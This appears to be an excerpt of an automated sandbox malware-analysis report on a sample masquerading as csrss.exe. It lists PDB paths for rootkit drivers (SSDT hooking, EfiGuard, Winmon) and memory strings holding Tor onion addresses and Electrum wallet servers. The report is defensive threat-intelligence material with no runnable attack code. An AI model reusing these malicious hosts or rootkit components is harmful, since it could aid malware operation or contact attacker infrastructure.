            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000026.00000002.427962622.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.392824484.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.406627827.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.408434896.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.428005891.0000000000C57000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000026.00000002.427962622.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 34_2_00007FF6A00B5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,34_2_00007FF6A00B5C10

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
